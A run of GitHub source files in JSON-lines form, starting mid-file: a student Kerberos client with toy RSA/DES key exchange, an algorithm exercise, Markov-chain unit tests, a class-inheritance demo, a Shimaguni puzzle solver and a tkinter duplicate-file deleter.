type_mes = type_message\n FIN = fin\n pipei_num=pipei\n baoliu = rongyu\n ack = my_port + b'|' + server_port + b'|' + serial_num + b'|' + type_mes + b'|' + FIN + b'|'+pipei_num + b'|'+ baoliu\n return ack\n\n#拆data部分\ndef unpacket_lisence(cont_data):\n id,e,n = cont_data.split(\",\")\n return id,e,n\n # return id,e,n\n\ndef unpacket_key_head(packet):\n port, my_port, num, type_message, fin, pipei, rongyu, data=packet.split(b'|')\n print(\"这个的data是: \",data)\n 
print(\"类型为:\",type(data))\n return data\n\ndef unpacket_TS_head(packet):\n port, my_port, num, type_message, fin, pipei, rongyu, data=packet.split(b'|')\n print(\"这个的data是: \",data)\n print(\"类型为:\",type(data))\n return type_message,data\n\n# 拆包报头\ndef unpacket(packet):\n port, my_port, num, type_message, fin, pipei, rongyu, data = packet.decode().split(\"|\")\n print(\"来源端口\", port, \"类型\", type(port))\n print(\"序列号\", num)\n print(\"信息类型\", type_message)\n print(\"结束标识\", fin)\n print(\"匹配为\",pipei)\n print(\"数据\", data)\n return type_message , pipei , data #返回值添加一个fin\n\n# 打包报头部分\ndef packet_head(port, num, type_message, fin,pipei, rongyu, data):\n my_port = port\n server_port = port\n serial_num = num\n type_mes = type_message\n FIN = fin\n pipei_num=pipei\n baoliu = rongyu\n baotou = my_port + b'|' + server_port + b'|' + serial_num + b'|' + type_mes + b'|' + FIN +b'|'+pipei_num+ b'|' + baoliu\n a_packet = baotou + b'|' + data\n print(a_packet)\n return a_packet\n\n#打包data部分\ndef packet_lisence(id,e,n):\n return id + b',' + e + b',' +n\n\n#C->AS,Kerberos过程打包data\ndef packet_data_2003(IDc,IDtgs):\n ts=get_time()\n TS=str(ts)\n ts1=TS.encode()\n return IDc+b','+IDtgs+b','+ts1\n\n#接受2004号报文(AS的ticket【tgs】\ndef recv_2004(data):\n global key_as,Key_c_to_tgs\n # Keyc='数据库里rsa发的key,转化为int'\n # key_as='67333333'\n print(\"C使用的key:\",key_as,type(key_as))\n encry_data=des.decrypt(data,key_as)\n print(\"解密用的key:\",key_as)\n print(\"****encry_data******\",encry_data,type(encry_data))\n Key_c_to_tgs,IDtgs,TS2,Lifetime2,ticket_tgs=encry_data.split(',')\n ts2 = int(TS2)\n now_time = get_time()\n if now_time - ts2 <= 10:\n return ticket_tgs\n else:\n return 'error'\n \n#处理接收到的数据内容\ndef solve_receive(conn, addr):\n # 接收客户端发送的消息\n with conn:\n while True:\n # 接收客户端发送的消息\n data = conn.recv(1024)\n if not data:\n break\n # 打印接收到的消息\n print('收到来自客户端的消息:', data.decode())\n print(data)\n # print('data: ',type(data),'data.decode',type(data.decode()))\n # 发送响应消息\n conn.sendall(b'Received: ' + data)\n \n\n#处理接收到的AS的证书\ndef process_AS_message_2001(cont_data,s):\n global serial_num,id_as,e_as,n_as,key_as\n # print(\"已接收到消息类型为2001的数据段,是传递证书的报文\")\n print(\"拆除掉报头部分的内容: \",cont_data)\n #得到id、e、n\n # id,e,n=unpacket_lisence(cont_data)\n #将id、e、n存入数据库中\n # save_sql(cont_data)\n id_as,e_as,n_as=unpacket_lisence(cont_data)\n print(\"as的id:\",id_as,\"as的e:\",e_as,\"as的n\",n_as)\n mack=packet_ack(b'65432',str(serial_num).encode(),b'2000',b'0',b'1001',b'00000000')\n print(\"mack:\",mack)\n s.sendall(mack)\n print(\"成功发送mack给AS\")\n serial_num=serial_num+1\n key_rcv=s.recv(1024)\n print(\"接收到的key_message为:\",key_rcv)\n secret_key=unpacket_key_head(key_rcv)\n secret_key=rsa.change_to_uint(secret_key)\n print(\"secret_key:\",secret_key)\n print(\"所使用的c私钥d,n为: \",d_c,n_c)\n key_as=rsa.rsa_decrypt(secret_key,d_c,n_c)\n key_as=key_as.decode()\n print(\"我得到的DES key为: \",key_as)\n\n flag='recv_2001'\n return flag\n\ndef process_AS_message_2002():\n pass\n\n# 使用字典存储每个值对应的处理函数\nprocess_dict = {\n \"2001\": process_AS_message_2001,\n \"2002\": process_AS_message_2002,\n}\n\n#发送的主线程 A发送->B接收->B发送->A接收\ndef send_thread():\n \"\"\"发送数据线程函数\"\"\"\n print('发送已启动,准备发送...')\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT_AS))\n # 从命令行读取用户输入\n # print(type(threading.get_ident()))\n global serial_num,n_c,e_c,d_c\n # serial_num_byte=serial_num.to_bytes(4, byteorder='big') \n n_c,e_c,d_c=getKey()\n print(\"e_c:\",e_c,\"n_c\",n_c,\"d_c\",d_c)\n 
data=packet_lisence(b'1004',str(e_c).encode(),str(n_c).encode())\n        print(\"data segment:\",data)\n        message=packet_head(b'65432',str(serial_num).encode(),b'2001',b'0',b'0000',b'00000000',data)\n        serial_num=serial_num+1\n        # print(serial_num)\n        # message = input(\"hi,i am tgs\")\n        # send the data to the server\n        s.sendall(message)\n        # receive the reply, then close the connection.\n        rcv_message = s.recv(1024)\n        print(\"rcv_message:\",rcv_message)\n        type_message_rcv,pipei,cont_data_rcv=unpacket(rcv_message)\n        print(\"message type:\",type_message_rcv)\n        print(\"data content:\",cont_data_rcv)\n        if type_message_rcv in process_dict:\n            process_dict[type_message_rcv](cont_data_rcv,s)\n        else:\n            # handle any other case\n            print(\"something may be wrong\")\n    \n\ndef send_kerberos_thread():\n    '''Thread function for the Kerberos exchange'''\n    print('kerberos sender started, ready to send...')\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.connect((HOST, PORT_AS))\n        # build message 2003\n        global serial_num\n        num=serial_num  # replace with the corresponding serial number\n        serial_num=serial_num+1\n        data_2003=packet_data_2003(b'1004',b'1002')\n        message_2003=packet_head(b'65433',b'3',b'2003',b'0',b'0000',b'00000000',data_2003)\n        s.sendall(message_2003)\n        message_2004=s.recv(1024)\n        print(message_2004)\n        type_message,data_2004=unpacket_TS_head(message_2004)\n        ticket_tgs=recv_2004(data_2004)\n        if ticket_tgs=='error':\n            # a='send timeout feedback'\n            mack=packet_ack(b'65432',b'4',b'2000',b'0',b'0000',b'ts2to')\n            s.sendall(mack)\n        else:\n            print(\"****** communication with the AS succeeded ******\")\n    \n\n    # create the thread that talks to the TGS\n\n    # type_message,data_2004=unpacket(message_2004)\n    # ticket_tgs=recv_2004(data_2004)\n    # if ticket_tgs=='error':\n    #     print(\"send timeout feedback\")\n    #     a='send timeout feedback'\n    # else:\n    #     pass\n    #     # create the thread that talks to the TGS\n\nmsend_thread = threading.Thread(target=send_thread)\nmsend_kerberos_thread=threading.Thread(target=send_kerberos_thread)\nmsend_thread.start()\nmsend_thread.join()\nmsend_kerberos_thread.start()\nmsend_kerberos_thread.join()\n","repo_name":"Guiziming/Kerberos-","sub_path":"C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":8238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37122811662","text":"def solution(sequence, k):\n    answer = []\n    n = len(sequence)\n    limit_sum, end = 0,0\n    sequence.sort()\n    \n    for i in range(len(sequence)):\n        while limit_sum < k and end < n:\n            limit_sum += sequence[end]\n            end +=1\n        \n        if limit_sum == k:\n            answer.append([i, end-1, end-1-i])\n        \n        limit_sum-= sequence[i]\n    \n    answer = sorted(answer, key=lambda x: x[2])\n    \n    return answer[0][:2]","repo_name":"sohyeonnn/Problem-Solving","sub_path":"프로그래머스/unrated/178870. 
연속된 부분 수열의 합/연속된 부분 수열의 합.py","file_name":"연속된 부분 수열의 합.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10628017235","text":"\"\"\"\nTest Markov chain functions that do not require random sampling.\n\nThe tests themselves may use random sampling.\n\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy as np\nimport networkx as nx\n\nfrom numpy.testing import (run_module_suite, TestCase,\n assert_equal, assert_allclose, assert_)\n\nfrom raoteh.sampler import _mc0, _mc0_dense\nfrom raoteh.sampler import _mcy, _mcy_dense\n\nfrom raoteh.sampler._density import dict_to_numpy_array\nfrom raoteh.sampler._sample_tree import get_random_branching_tree\n\n\ndef _get_random_nx_transition_matrix(nstates):\n \"\"\"\n Sample a random sparse state transition matrix.\n\n Each row of the transition matrix will be missing an entry.\n\n Parameters\n ----------\n nstates : integer\n The number of states in the transition matrix.\n\n Returns\n -------\n P : directed weighted networkx graph\n The sparse transition matrix.\n\n \"\"\"\n P = nx.DiGraph()\n for i in range(nstates):\n jmissing = np.random.randint(nstates)\n weights = np.random.exponential(size=nstates)\n weights[jmissing] = 0\n total_weight = np.sum(weights)\n for j, weight in enumerate(weights):\n if j != jmissing:\n p = weight / total_weight\n P.add_edge(i, j, weight=p)\n return P\n\n\ndef _get_random_test_setup(nstates):\n \"\"\"\n\n Returns\n -------\n T : undirected networkx graph\n Edges are annotated with transition matrix P.\n root : integer\n Root node.\n root_distn : dict\n Probability distribution at the root.\n node_to_allowed_states : dict\n Map from node to set of allowed states.\n\n \"\"\"\n # Sample a random tree.\n branching_distn = [0.7, 0.1, 0.1, 0.1]\n T = get_random_branching_tree(branching_distn, maxnodes=6)\n root = 0\n\n # For each edge on the tree,\n # sample a random sparse state transition matrix.\n for na, nb in nx.bfs_edges(T, root):\n T[na][nb]['P'] = _get_random_nx_transition_matrix(nstates)\n\n # Sample a root distribution.\n # It should be a little bit sparse, for testing.\n weights = np.random.exponential(size=nstates)\n imissing = np.random.randint(nstates)\n pairs = [(i, w) for i, w in enumerate(weights) if i != imissing]\n weights[imissing] = 0\n total_weight = np.sum(weights)\n root_distn = dict((i, w / total_weight) for i, w in pairs)\n\n # Sample allowed states at each node.\n # Disallow a random state at each node.\n states = range(nstates)\n node_to_allowed_states = dict((n, set(states)) for n in T)\n for n in T:\n imissing = np.random.randint(nstates)\n node_to_allowed_states[n].remove(imissing)\n\n # Final check on transition matrices on edges of T.\n for na, nb in nx.bfs_edges(T, root):\n edge_object = T[na][nb]\n P = edge_object.get('P', None)\n if P is None:\n raise Exception('internal error')\n\n # Return the random info for testing.\n return T, root, root_distn, node_to_allowed_states\n\n\ndef _assert_dict_distn_allclose(da, db):\n # This is a helper function for testing.\n assert_equal(set(da), set(db))\n da_vector = np.array(\n [v for k, v in sorted(da.items())], dtype=float)\n db_vector = np.array(\n [v for k, v in sorted(db.items())], dtype=float)\n assert_allclose(da_vector, db_vector)\n\n\ndef _assert_nx_matrix_allclose(U, V):\n # This is a helper function for testing.\n assert_equal(set(U), set(V))\n assert_equal(set(U.edges()), set(V.edges()))\n 
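# collect the corresponding edge weights from both graphs for elementwise comparison\n    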
U_weights = []\n V_weights = []\n for a, b in U.edges():\n U_weights.append(U[a][b]['weight'])\n V_weights.append(V[a][b]['weight'])\n u = np.array(U_weights, dtype=float)\n v = np.array(V_weights, dtype=float)\n assert_allclose(u, v)\n\n\nclass TestMarkovChain(TestCase):\n\n def test_history_log_likelihood_P_default(self):\n T = nx.Graph()\n T.add_edge(0, 1)\n T.add_edge(0, 2)\n T.add_edge(0, 3)\n root = 0\n node_to_state = {0:0, 1:0, 2:0, 3:0}\n root_distn = {0 : 0.5, 1 : 0.5, 2 : 0, 3 : 0}\n P = nx.DiGraph()\n P.add_weighted_edges_from([\n (0, 0, 0.5),\n (0, 1, 0.25),\n (0, 2, 0.25),\n (1, 1, 0.5),\n (1, 2, 0.25),\n (1, 0, 0.25),\n (2, 2, 0.5),\n (2, 0, 0.25),\n (2, 1, 0.25)])\n desired = 4 * np.log(0.5)\n\n # Check sparse mc0.\n actual_sparse = _mc0.get_history_log_likelihood(\n T, root, node_to_state,\n root_distn=root_distn, P_default=P)\n assert_equal(actual_sparse, desired)\n\n # Check dense mc0.\n P_dense = nx.to_numpy_matrix(P, nodelist=range(3)).A\n actual_dense = _mc0_dense.get_history_log_likelihood(\n T, root, node_to_state,\n root_distn=root_distn, P_default=P_dense)\n assert_equal(actual_dense, desired)\n\n def test_node_to_distn(self):\n # Test the marginal distributions of node states.\n\n # Try an example where no state is initially known,\n # but for which the transition matrix will cause\n # the joint distribution of states at all nodes to be\n # all in the same state.\n # This will cause all states to have the same distribution\n # as the root distribution.\n nstates = 3\n states = range(nstates)\n P = nx.DiGraph()\n P.add_weighted_edges_from([(s, s, 1) for s in states])\n T = nx.Graph()\n T.add_edge(0, 1)\n T.add_edge(0, 2)\n T.add_edge(0, 3)\n root = 0\n node_to_allowed_states = dict((n, set(states)) for n in T)\n for root_distn in (\n {0 : 0.10, 1 : 0.40, 2 : 0.50},\n {0 : 0.25, 1 : 0.50, 2 : 0.25},\n ):\n\n # Code common to both sparse and dense tests.\n node_to_set = node_to_allowed_states\n\n # Sparse test.\n\n # Get the node distributions naively.\n node_to_distn_naive_sparse = _mc0.get_node_to_distn_naive(\n T, root, node_to_set, root_distn=root_distn, P_default=P)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_sparse = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states,\n P_default=P)\n node_to_distn_fast_sparse = _mc0.get_node_to_distn(\n T, root, node_to_pmap_sparse,\n root_distn=root_distn, P_default=P)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node, distn in node_to_distn_naive_sparse.items():\n _assert_dict_distn_allclose(root_distn, distn)\n for node, distn in node_to_distn_fast_sparse.items():\n _assert_dict_distn_allclose(root_distn, distn)\n\n # Dense test.\n # Get the dense transition matrix.\n P_dense = nx.to_numpy_matrix(P, states).A\n root_ndarray_distn = dict_to_numpy_array(root_distn, range(nstates))\n\n # Get the node distributions naively.\n node_to_distn_naive_dense = _mc0_dense.get_node_to_distn_naive(\n T, root, node_to_set, nstates,\n root_distn=root_ndarray_distn, P_default=P_dense)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(T, root, nstates,\n node_to_allowed_states=node_to_allowed_states,\n P_default=P_dense)\n node_to_distn_fast_dense = _mc0_dense.get_node_to_distn(\n T, root, node_to_pmap_dense, nstates,\n root_distn=root_ndarray_distn, P_default=P_dense)\n node_to_distn_esd_dense = _mc0_dense.get_node_to_distn_esd(\n T, root, 
node_to_pmap_dense, nstates,\n root_distn=root_ndarray_distn, P_default=P_dense)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node, distn in node_to_distn_naive_dense.items():\n assert_allclose(distn, root_ndarray_distn)\n for node, distn in node_to_distn_fast_dense.items():\n assert_allclose(distn, root_ndarray_distn)\n for node, distn in node_to_distn_esd_dense.items():\n assert_allclose(distn, root_ndarray_distn)\n\n\n def test_node_to_distn_naive_vs_fast_random(self):\n # Test the marginal distributions of node states.\n\n # This test uses a complicated tree with complicated transitions.\n # It checks the naive way of computing node_to_distn against\n # the more clever fast way to compute node_to_distn.\n # The two methods should give the same answer.\n np.random.seed(1234)\n nstates = 4\n nsamples = 10\n for i in range(nsamples):\n info = _get_random_test_setup(nstates)\n T, root, root_distn, node_to_allowed_states = info\n assert_equal(len(T), len(node_to_allowed_states))\n assert_(all(len(v) > 1 for v in node_to_allowed_states.values()))\n\n # Code common to both sparse and dense tests.\n node_to_set = node_to_allowed_states\n\n # Sparse tests.\n\n # Get the node distributions naively.\n node_to_distn_naive = _mc0.get_node_to_distn_naive(T, root,\n node_to_set, root_distn=root_distn)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_fast = _mc0.get_node_to_distn(T, root, node_to_pmap,\n root_distn=root_distn)\n\n # Compare distributions at the root.\n root_distn_naive = node_to_distn_naive[root]\n root_distn_fast = node_to_distn_fast[root]\n _assert_dict_distn_allclose(root_distn_naive, root_distn_fast)\n\n # Compare distributions at all nodes.\n for node in T:\n distn_naive = node_to_distn_naive[node]\n distn_fast = node_to_distn_fast[node]\n _assert_dict_distn_allclose(distn_naive, distn_fast)\n\n # Dense tests.\n # Use edge-specific dense ('esd') transition matrices.\n # Get the dense root distribution.\n T_esd = nx.Graph()\n for na, nb in nx.bfs_edges(T, root):\n P = T[na][nb]['P']\n P_dense = nx.to_numpy_matrix(P, range(nstates)).A\n T_esd.add_edge(na, nb, P=P_dense)\n root_distn_dense = dict_to_numpy_array(root_distn, range(nstates))\n\n # Get the node distributions naively.\n node_to_distn_naive_dense = _mc0_dense.get_node_to_distn_naive(\n T_esd, root, node_to_set, nstates,\n root_distn=root_distn_dense)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(\n T_esd, root, nstates,\n node_to_allowed_states=node_to_allowed_states)\n for n, sparse_pmap in node_to_pmap.items():\n a = dict_to_numpy_array(sparse_pmap, range(nstates))\n b = node_to_pmap_dense[n]\n err_msg = 'n: %s' % n\n assert_allclose(a, b, err_msg=err_msg)\n node_to_distn_fast_dense = _mc0_dense.get_node_to_distn(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n node_to_distn_esd_dense = _mc0_dense.get_node_to_distn_esd(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n\n # Compare distributions at the root.\n root_distn_naive_dense = node_to_distn_naive_dense[root]\n root_distn_fast_dense = node_to_distn_fast_dense[root]\n root_distn_esd_dense = node_to_distn_esd_dense[root]\n assert_allclose(root_distn_fast_dense, root_distn_naive_dense)\n assert_allclose(root_distn_esd_dense, root_distn_naive_dense)\n\n # 
Compare distributions at all nodes.\n for node in T_esd:\n distn_naive_dense = node_to_distn_naive_dense[node]\n distn_fast_dense = node_to_distn_fast_dense[node]\n distn_esd_dense = node_to_distn_esd_dense[node]\n assert_allclose(distn_fast_dense, distn_naive_dense)\n assert_allclose(distn_esd_dense, distn_naive_dense)\n\n def test_node_to_distn_unrestricted(self):\n # Test the marginal distributions of node states.\n\n # This test uses a complicated tree with complicated transitions.\n # It checks the naive way of computing node_to_distn against\n # the more clever fast way to compute node_to_distn.\n # The two methods should give the same answer.\n nstates = 4\n nsamples = 10\n for i in range(nsamples):\n info = _get_random_test_setup(nstates)\n T, root, root_distn, node_to_allowed_states = info\n node_to_allowed_states = dict((n, set(range(nstates))) for n in T)\n assert_equal(len(T), len(node_to_allowed_states))\n assert_(all(len(v) > 1 for v in node_to_allowed_states.values()))\n\n # Code common to both sparse and dense tests.\n node_to_set = node_to_allowed_states\n\n # Sparse tests.\n\n # Get the node distributions naively.\n node_to_distn_naive = _mc0.get_node_to_distn_naive(T, root,\n node_to_set, root_distn=root_distn)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_fast = _mc0.get_node_to_distn(\n T, root, node_to_pmap, root_distn=root_distn)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node in T:\n distn_naive = node_to_distn_naive[node]\n distn_fast = node_to_distn_fast[node]\n _assert_dict_distn_allclose(distn_fast, distn_naive)\n\n # Dense tests.\n # Use edge-specific dense ('esd') transition matrices.\n # Get the dense root distribution.\n T_esd = nx.Graph()\n for na, nb in nx.bfs_edges(T, root):\n P = T[na][nb]['P']\n P_dense = nx.to_numpy_matrix(P, range(nstates)).A\n T_esd.add_edge(na, nb, P=P_dense)\n root_distn_dense = dict_to_numpy_array(root_distn, range(nstates))\n\n # Get the node distributions naively.\n node_to_distn_naive_dense = _mc0_dense.get_node_to_distn_naive(\n T_esd, root, node_to_set, nstates,\n root_distn=root_distn_dense)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(\n T_esd, root, nstates,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_fast_dense = _mc0_dense.get_node_to_distn(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n node_to_distn_esd_dense = _mc0_dense.get_node_to_distn_esd(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node in T_esd:\n distn_naive_dense = node_to_distn_naive_dense[node]\n distn_fast_dense = node_to_distn_fast_dense[node]\n distn_esd_dense = node_to_distn_esd_dense[node]\n assert_allclose(distn_fast_dense, distn_naive_dense)\n assert_allclose(distn_esd_dense, distn_naive_dense)\n\n def test_joint_endpoint_distn(self):\n # Test joint endpoint state distributions on edges.\n nstates = 4\n nsamples = 10\n for i in range(nsamples):\n info = _get_random_test_setup(nstates)\n T, root, root_distn, node_to_allowed_states = info\n assert_equal(len(T), len(node_to_allowed_states))\n assert_(all(len(v) > 1 for v in node_to_allowed_states.values()))\n T_aug_naive = _mc0.get_joint_endpoint_distn_naive(T, root,\n 
node_to_allowed_states, root_distn=root_distn)\n            node_to_pmap = _mcy.get_node_to_pmap(T, root,\n                    node_to_allowed_states=node_to_allowed_states)\n            node_to_distn = _mc0.get_node_to_distn(T, root, node_to_pmap,\n                    root_distn=root_distn)\n            T_aug_fast = _mc0.get_joint_endpoint_distn(\n                    T, root, node_to_pmap, node_to_distn)\n\n            # Sparse tests.\n\n            # Check that transition sparsity patterns agree.\n            for na, nb in nx.bfs_edges(T, root):\n                assert_(T_aug_naive.has_edge(na, nb))\n                assert_(T_aug_fast.has_edge(na, nb))\n\n            # Check that transition probability distributions agree.\n            for na, nb in nx.bfs_edges(T, root):\n                J_naive = T_aug_naive[na][nb]['J']\n                J_fast = T_aug_fast[na][nb]['J']\n                _assert_nx_matrix_allclose(J_naive, J_fast)\n\n            # Dense tests.\n\n            # Use edge-specific dense ('esd') transition matrices.\n            # Get the dense root distribution.\n            T_esd = nx.Graph()\n            for na, nb in nx.bfs_edges(T, root):\n                P = T[na][nb]['P']\n                P_dense = nx.to_numpy_matrix(P, range(nstates)).A\n                T_esd.add_edge(na, nb, P=P_dense)\n            root_distn_dense = dict_to_numpy_array(root_distn, range(nstates))\n\n            # Construct some dense structures.\n            T_aug_naive_dense = _mc0_dense.get_joint_endpoint_distn_naive(\n                    T_esd, root,\n                    node_to_allowed_states, root_distn=root_distn_dense)\n            node_to_pmap_dense = _mcy_dense.get_node_to_pmap(\n                    T_esd, root, nstates,\n                    node_to_allowed_states=node_to_allowed_states)\n            node_to_distn_dense = _mc0_dense.get_node_to_distn(\n                    T_esd, root, node_to_pmap_dense, nstates,\n                    root_distn=root_distn_dense)\n            T_aug_fast_dense = _mc0_dense.get_joint_endpoint_distn(\n                    T_esd, root,\n                    node_to_pmap_dense, node_to_distn_dense, nstates)\n\n            # Check that transition probability distributions agree.\n            for na, nb in nx.bfs_edges(T_esd, root):\n                J_naive_dense = T_aug_naive_dense[na][nb]['J']\n                J_fast_dense = T_aug_fast_dense[na][nb]['J']\n                assert_allclose(J_naive_dense, J_fast_dense)\n\n\nif __name__ == '__main__':\n    run_module_suite()\n\n","repo_name":"argriffing/raoteh","sub_path":"raoteh/sampler/tests/test_mc.py","file_name":"test_mc.py","file_ext":"py","file_size_in_byte":19291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17360826193","text":"class Weapon:  # weapon base class\n    def __init__(self):\n        print(\"I am a kind of weapon\")\n    def Date(self,kind,atk):\n        self.kind = kind\n        self.atk =atk\n        print(\"%s now has its attack power\"%self.kind)\n    def Action(self,price,attack):\n        self.price = price\n        self.attack = attack\n        print(\"the price of %s is: %s\" % (self.kind,self.price))\n        print(\"%s is about to attack you\"%self.kind)  # uses the instance variable self.kind\n\nclass Gun(Weapon):\n    \"\"\"Subclass defines its own constructor and does not call the parent's\"\"\"\n    def __init__(self):  # overrides the parent method\n        pass\n    def Date(self,atk,atk_speed):\n        super().Date(\"pistol\",atk)\n        self.atk_speed = atk_speed\n        self.powder = self.atk * self.atk_speed\n        print(\"attack power per second: %d\"%self.powder)\n\nclass Grenade(Weapon):  # no overriding constructor, so the parent __init__ runs\n    \"\"\"Subclass without a constructor automatically calls the parent's\"\"\"\n    def Date(self,atk,atk_scope):\n        super().Date(\"grenade\",atk)\n        self.atk_scope= atk_scope\n        print(\"attack range: %d\"%self.atk_scope)\n\nw01 = Weapon()\nw01.Date(\"weapon\",123)\nw01.Action(244,21)\n\ng01 =Gun()\ng01.Date(1221,12)\ng01.Action(2121,122)\n\nG01 = Grenade()\nG01.Date(1221,32)\nG01.Action(1221,21)","repo_name":"15988108363/Github","sub_path":"2020.06.29-武器.py","file_name":"2020.06.29-武器.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5564181008","text":"from .claspy import *\nfrom . 
import utils\nfrom .utils import borders\nfrom .utils.borders import Direction\nfrom .utils.shading import *\nfrom .utils.grids import *\n\ndef encode(string):\n return utils.encode(string, has_borders = True)\n\ndef solve(E):\n rooms = utils.regions.full_bfs(E.R, E.C, E.edges)\n # Map clue numbers to their rooms.\n clue_coord_to_room = {}\n for clue in E.clues:\n for room in rooms:\n for cell in room:\n if clue == cell:\n clue_coord_to_room[clue] = room\n break\n\n max_val = max(max([len(room) for room in rooms]), max(E.clues.values(), default = 0))\n set_max_val(max_val)\n s = RectangularGridShadingSolver(E.R, E.C)\n conn = [[Atom() for c in range(E.C)] for r in range(E.R)]\n chosen = [[BoolVar() for c in range(E.C)] for r in range(E.R)]\n num_shaded_in_region = [[IntVar(1, max_val) for c in range(E.C)] for r in range(E.R)]\n\n # Shaded cells in a region must be connected.\n for room in rooms:\n for (r, c) in room:\n # Connected iff shaded.\n require(conn[r][c] == s.grid[r][c])\n # Prove the \"chosen\" cell for the region.\n conn[r][c].prove_if(chosen[r][c])\n # Prove via connectivity.\n for (y, x) in get_neighbors(E.R, E.C, r, c):\n if (y, x) in room:\n conn[r][c].prove_if(conn[y][x] & s.grid[r][c])\n # Choose 1 cell per region.\n require(at_most(1, [chosen[r][c] for (r, c) in room]))\n\n # Clue cells indicate number of shaded cells there.\n for coord, room in clue_coord_to_room.items():\n require(sum_bools(E.clues[coord], [s.grid[r][c] for (r, c) in room]))\n\n # Every room has at least 1 shaded cell.\n for room in rooms:\n # Don't need to check clued cells.\n if room not in clue_coord_to_room.values():\n require(at_least(1, [s.grid[r][c] for (r, c) in room]))\n \n # Calculate # shaded in each region (needed for next step).\n for room in rooms:\n num_shaded = IntVar(0)\n for (r, c) in room:\n num_shaded += cond(s.grid[r][c], 1, 0)\n for (r, c) in room:\n require(num_shaded_in_region[r][c] == num_shaded)\n\n for r in range(E.R):\n for c in range(E.C):\n if r < E.R:\n if (r+1, c, Direction.TOP) in E.edges:\n # Regions with same # black cells cannot be adjacent.\n require(num_shaded_in_region[r][c] != num_shaded_in_region[r+1][c])\n # Cells orthogonally adjacent across region boundaries - >= 1 unshaded.\n require(at_most(1, [s.grid[r][c], s.grid[r+1][c]]))\n if c < E.C:\n if (r, c+1, Direction.LEFT) in E.edges:\n # Regions with same # black cells cannot be adjacent.\n require(num_shaded_in_region[r][c] != num_shaded_in_region[r][c+1])\n # Cells orthogonally adjacent across region boundaries - >= 1 unshaded.\n require(at_most(1, [s.grid[r][c], s.grid[r][c+1]]))\n \n return s.solutions(shaded_color = 'darkgray')\n\ndef decode(solutions):\n return utils.decode(solutions)","repo_name":"mstang107/noq","sub_path":"solvers/shimaguni.py","file_name":"shimaguni.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"46694237966","text":"from tkinter import filedialog\r\nimport tkinter.font as font\r\nfrom tkinter import *\r\nfrom packages.deletecopies import *\r\n\r\ndef browse_button():\r\n # Allow user to select a directory and store it in global var\r\n # called folder_path\r\n filename = filedialog.askdirectory()\r\n if filename != \"\":\r\n folder_path.set(filename)\r\n finished_statement.set(\"Click the button to start cleaning\")\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"500x250\")\r\nroot.resizable(False, False)\r\nroot.title(\"Duplicates 
Deleter\")\r\nroot.configure(bg=\"#303444\")\r\nroot.iconphoto(False, PhotoImage(file='assets/icon/logo.png'))\r\n\r\nfolder_path = StringVar(value=\"Please select a folder\")\r\nfinished_statement = StringVar(value=\"Click the button to start cleaning\")\r\n\r\n\r\n# Styling\r\ntitleFont = font.Font(size=18, weight=font.BOLD)\r\nshowLabelFont = font.Font(family=\"Helvetica\")\r\nfinishedFont = font.Font(family=\"Helvetica\", size=8)\r\nbrowseButtonFont = font.Font(family=\"Arial\", size=10, weight=font.BOLD)\r\ndeleteButtonFont = font.Font(family=\"Arial\", size=12, weight=font.BOLD)\r\n\r\nprimary = \"#303444\"\r\nsecondary = \"#3E4458\"\r\nwhite = \"#fff\"\r\n\r\nmiddle = 0.5\r\n\r\n\r\ntitleLabel = Label(master=root, text=\"Duplicates Deleter\", bg=primary, fg=white,anchor='w', height=2)\r\ntitleLabel.place(relx=middle, rely=0.18, anchor=CENTER)\r\ntitleLabel['font'] = titleFont\r\n\r\nshowLabel = Label(master=root,textvariable=folder_path, bg=secondary, fg=white,anchor='w', height=2)\r\nshowLabel.pack(fill='x', padx=30, pady=92)\r\nshowLabel['font'] = showLabelFont\r\n\r\nselectButton = Button(text=\"SELECT\", command=browse_button, bg=primary, fg=white, height=1)\r\nselectButton.place(relx=0.86, rely=0.45, anchor=CENTER)\r\nselectButton['font'] = browseButtonFont\r\n\r\ndeleteButton = Button(text=\"CLEAN\", command=lambda:check_for_duplicates([folder_path.get()], finished_statement), bg=white, fg=primary, height=2, width=12)\r\ndeleteButton.place(relx=middle, rely=0.76, anchor=CENTER)\r\ndeleteButton['font'] = deleteButtonFont\r\n\r\nfinishedLabel = Label(master=root,textvariable=finished_statement, 